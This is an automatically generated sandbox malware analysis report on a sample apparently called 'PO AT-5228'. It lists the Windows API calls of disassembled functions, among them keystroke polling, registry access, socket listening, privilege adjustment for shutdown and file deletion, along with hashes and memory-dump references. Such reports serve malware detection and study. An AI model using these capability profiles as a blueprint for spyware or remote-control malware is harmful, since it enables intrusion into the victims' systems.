                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                        • API String ID: 0-4052911093
                                                                                        • Opcode ID: 112b2966b03705d6bec84380f64b636769d9122097d6b918b58d84a71dea1dd3
                                                                                        • Instruction ID: 9b5843d76f971d74a3abffba831cfb8bc9a51fda686ba509d583c7d4f8dcd22a
                                                                                        • Opcode Fuzzy Hash: 112b2966b03705d6bec84380f64b636769d9122097d6b918b58d84a71dea1dd3
                                                                                        • Instruction Fuzzy Hash: BA725C71E042699BDF14CF59C8807AEB7F5FF48714F1481AAE809AB380DB749E81DB94
                                                                                        APIs
                                                                                          • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BA5FA6,?), ref: 00BA6ED8
                                                                                          • Part of subcall function 00BA72CB: GetFileAttributesW.KERNEL32(?,00BA6019), ref: 00BA72CC
                                                                                        • _wcscat.LIBCMT ref: 00BA6441
                                                                                        • __wsplitpath.LIBCMT ref: 00BA645F
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BA6474
                                                                                        • _wcscpy.LIBCMT ref: 00BA64A3
                                                                                        • _wcscat.LIBCMT ref: 00BA64B8
                                                                                        • _wcscat.LIBCMT ref: 00BA64CA
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00BA64DA
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BA64EB
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BA6506
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 2643075503-1173974218
                                                                                        • Opcode ID: a1c02a1f062ff393ae933436e39f7297df3c94d164e037caa674617404592538
                                                                                        • Instruction ID: 4955fcd41e8db578958da51c1aa166524baf3d7a717c1936e7949d1e6f939fea
                                                                                        • Opcode Fuzzy Hash: a1c02a1f062ff393ae933436e39f7297df3c94d164e037caa674617404592538
                                                                                        • Instruction Fuzzy Hash: AD3182F280C388AEC721EBA488859DB77DCAF56310F44096AF6D9C3141EA35D50DC7A7
                                                                                        APIs
                                                                                          • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC328E
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BC332D
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BC33C5
                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BC3604
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BC3611
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1240663315-0
                                                                                        • Opcode ID: e0b9bf21f3b629d2d10c9aef82e88883f341e8a0f5ca7cf3e2b035b5ccdd3845
                                                                                        • Instruction ID: 20d03a4eb3716d03dfa6062c610b8d55aaa3ed509ac9bac34ef2c7e531ea6f3d
                                                                                        • Opcode Fuzzy Hash: e0b9bf21f3b629d2d10c9aef82e88883f341e8a0f5ca7cf3e2b035b5ccdd3845
                                                                                        • Instruction Fuzzy Hash: CEE14B71604210AFCB15DF28C995E2ABBE8FF89714B04C4ADF44ADB262DB35E905CB52
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00BA2B5F
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00BA2BE0
                                                                                        • GetKeyState.USER32(000000A0), ref: 00BA2BFB
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00BA2C15
                                                                                        • GetKeyState.USER32(000000A1), ref: 00BA2C2A
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00BA2C42
                                                                                        • GetKeyState.USER32(00000011), ref: 00BA2C54
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00BA2C6C
                                                                                        • GetKeyState.USER32(00000012), ref: 00BA2C7E
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00BA2C96
                                                                                        • GetKeyState.USER32(0000005B), ref: 00BA2CA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 3a58b5828003cb2ba8a70661a7f3a20f85db5d6532feb23da30a376c382c76ce
                                                                                        • Instruction ID: 590cd1c7b49b95b7ed65ae4aa28d55982f21c3f5490bb85d05777f6a202e2c06
                                                                                        • Opcode Fuzzy Hash: 3a58b5828003cb2ba8a70661a7f3a20f85db5d6532feb23da30a376c382c76ce
                                                                                        • Instruction Fuzzy Hash: B041D83450C7C96EFF349B6889443AABEE0EB23314F4440D9D9C65B6C1EBA499C4C7A2
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        • Opcode ID: 3ce262ce0a9c321660d7e173d7303f62ca6916c6f39373d9db4cb59ca22c44d5
                                                                                        • Instruction ID: b2994438a565fa295cb75a90cd5512738f29f6fcbadb817a4a2d92ed8dae540b
                                                                                        • Opcode Fuzzy Hash: 3ce262ce0a9c321660d7e173d7303f62ca6916c6f39373d9db4cb59ca22c44d5
                                                                                        • Instruction Fuzzy Hash: 1F214C31300110AFDB11AF64DD89B6D77E8EF54711F0484A9F90ADB2A1DFB9ED018B55
                                                                                        APIs
                                                                                          • Part of subcall function 00B99ABF: CLSIDFromProgID.OLE32 ref: 00B99ADC
                                                                                          • Part of subcall function 00B99ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00B99AF7
                                                                                          • Part of subcall function 00B99ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00B99B05
                                                                                          • Part of subcall function 00B99ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00B99B15
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00BBC235
                                                                                        • _memset.LIBCMT ref: 00BBC242
                                                                                        • _memset.LIBCMT ref: 00BBC360
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00BBC38C
                                                                                        • CoTaskMemFree.OLE32(?), ref: 00BBC397
                                                                                        Strings
                                                                                        • NULL Pointer assignment, xrefs: 00BBC3E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 1300414916-2785691316
                                                                                        • Opcode ID: 26126c87c23c30c51ba59883289c58e9099ac58342b84df9e438c1cd05628232
                                                                                        • Instruction ID: 571b7cedf21f9e4c1636ddf096dc545e51cd5c02068ea492b6ebd2f79f3849e9
                                                                                        • Opcode Fuzzy Hash: 26126c87c23c30c51ba59883289c58e9099ac58342b84df9e438c1cd05628232
                                                                                        • Instruction Fuzzy Hash: 69910971D00218ABDB10DF94DC95EEEBBF9EF04710F1081AAF519A7291DBB19A45CFA0
                                                                                        APIs
                                                                                          • Part of subcall function 00B9B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9B180
                                                                                          • Part of subcall function 00B9B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B9B1AD
                                                                                          • Part of subcall function 00B9B134: GetLastError.KERNEL32 ref: 00B9B1BA
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00BA7A0F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
                                                                                        • Opcode ID: b04fd7abeda935ea301f7b4fed8ce06f072ec0f75836364a3718be60bff15627
                                                                                        • Instruction ID: 779327c0b85400409b8cecfc9fe4a1cd9b356f391e00abd9de90bd77154f7feb
                                                                                        • Opcode Fuzzy Hash: b04fd7abeda935ea301f7b4fed8ce06f072ec0f75836364a3718be60bff15627
                                                                                        • Instruction Fuzzy Hash: E201A7757EC2517FFB285768DC9ABBF73D8DB02740F2404A5B953A60D2DDA15E0081A4
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00BB8CA8
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8CB7
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00BB8CD3
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00BB8CE2
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8CFC
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00BB8D10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        • Opcode ID: 8025cc7d954b1dca86e5e8ee4c72a6445fcf3472dd76fdcea0cf674bc406d78e
                                                                                        • Instruction ID: 9c5f9f25ecdfe606819f1b709624a37cf774951199018dcfff775b8c650b28ab
                                                                                        • Opcode Fuzzy Hash: 8025cc7d954b1dca86e5e8ee4c72a6445fcf3472dd76fdcea0cf674bc406d78e
                                                                                        • Instruction Fuzzy Hash: 9521A0716002009FCB10AF68C985BBEB7E9EF49310F108199F916AB2D2CBB0AD45CB51
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00BA6554
                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00BA6564
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00BA6583
                                                                                        • __wsplitpath.LIBCMT ref: 00BA65A7
                                                                                        • _wcscat.LIBCMT ref: 00BA65BA
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00BA65F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1605983538-0
                                                                                        • Opcode ID: 99cf76ad92150c5f7fc352107173d951af54e48ee9c7c9f4eeae9ab5bff0b190
                                                                                        • Instruction ID: 592bb7ca622c100a3ead99a18d2b1b58010940dd683f67d53fcbee8c8642f881
                                                                                        • Opcode Fuzzy Hash: 99cf76ad92150c5f7fc352107173d951af54e48ee9c7c9f4eeae9ab5bff0b190
                                                                                        • Instruction Fuzzy Hash: 9F2153B1904258ABDB10ABA4CC88BDDB7FCAB55300F5404E9E905E7141DBB19F85CB61
                                                                                        APIs
                                                                                          • Part of subcall function 00BBA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00BBA84E
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00BB9296
                                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00BB92B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 4170576061-0
                                                                                        • Opcode ID: 5e1acebaa0f4f3a9b111230d80ca3a4e9c2f31df4c427c6ac582d984e4f79d40
                                                                                        • Instruction ID: 47201bf38e5121886102eaca03494c2b8641163d97008dc6393807f35c787a8c
                                                                                        • Opcode Fuzzy Hash: 5e1acebaa0f4f3a9b111230d80ca3a4e9c2f31df4c427c6ac582d984e4f79d40
                                                                                        • Instruction Fuzzy Hash: 16419370600204AFDB14AF68CC92E7E77EDEF44724F14859CF95AAB3D2DAB49D018B91
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BAEB8A
                                                                                        • _wcscmp.LIBCMT ref: 00BAEBBA
                                                                                        • _wcscmp.LIBCMT ref: 00BAEBCF
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00BAEBE0
                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00BAEC0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 2387731787-0
                                                                                        • Opcode ID: 776f3de48990231b573b16bb653c5c33df7fae5e0c6d492db9020726cd5a4d4f
                                                                                        • Instruction ID: 04d8921160c2817dde75554222f46c9c3c6d3ca30f2b32b230f1c2f0437cba3b
                                                                                        • Opcode Fuzzy Hash: 776f3de48990231b573b16bb653c5c33df7fae5e0c6d492db9020726cd5a4d4f
                                                                                        • Instruction Fuzzy Hash: FC41B1356043029FCB08DF28C4D1AA9B7E4FF4A324F10459DF96A8B3A1DB71E944CB51
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: 5d7049f2ef4b26bd49977a675e3d60c2f71d1afae2dc1cc5add254ab6bd25656
                                                                                        • Instruction ID: 63c5ce325137e68f52579465abf3f5ac8a449841fab08656bc5d6c34332932be
                                                                                        • Opcode Fuzzy Hash: 5d7049f2ef4b26bd49977a675e3d60c2f71d1afae2dc1cc5add254ab6bd25656
                                                                                        • Instruction Fuzzy Hash: 1611B2313005106FE7215F26DC84F6F7BD8EF58761B0944ADF849EB241CF74D90286A4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                        • API String ID: 0-1546025612
                                                                                        • Opcode ID: 831355b37936a0775bac8a384fdc5f0b32363e4a0be35e243e1e6cae89bb66e9
                                                                                        • Instruction ID: 6e94091f7ecc37b8bd4fb60a6a73474fd26d76bf5215eb374fcdbb9d181ca544
                                                                                        • Opcode Fuzzy Hash: 831355b37936a0775bac8a384fdc5f0b32363e4a0be35e243e1e6cae89bb66e9
                                                                                        • Instruction Fuzzy Hash: E7926C71A0025ACBDF24CF59C8907AEB7F1FB54314F2581EAE816AB280D7799D81CF91
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00B7E014,74DF0AE0,00B7DEF1,00BFDC38,?,?), ref: 00B7E02C
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B7E03E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                        • API String ID: 2574300362-192647395
                                                                                        • Opcode ID: ca6a4a7253bffc1542939d652d4bb23c7fed61aeeec8928136cefdd8ffa9d59b
                                                                                        • Instruction ID: 854853465db5c15f9b1f300953951412f2399fdd963a79fc05e0611b5ad9185a
                                                                                        • Opcode Fuzzy Hash: ca6a4a7253bffc1542939d652d4bb23c7fed61aeeec8928136cefdd8ffa9d59b
                                                                                        • Instruction Fuzzy Hash: AED09E745007129ED7215B65E84975276E4EF06711F1884A9E4A5A2150DAF4D8808661
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00BA13DC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: ($|
                                                                                        • API String ID: 1659193697-1631851259
                                                                                        • Opcode ID: d93b60cd83b500951764be9229e778ef4fb5062c7a3396a71211ab6c159d917a
                                                                                        • Instruction ID: 51c0389857ebd390a6f869d6cf86f1f6b52eedb8f7d2c7f214d74bf027121b1d
                                                                                        • Opcode Fuzzy Hash: d93b60cd83b500951764be9229e778ef4fb5062c7a3396a71211ab6c159d917a
                                                                                        • Instruction Fuzzy Hash: D5321475A046059FCB68CF6DC48096AB7F0FF49320B15C9AEE49ADB3A1E770E941CB44
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B7B22F
                                                                                          • Part of subcall function 00B7B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B7B5A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
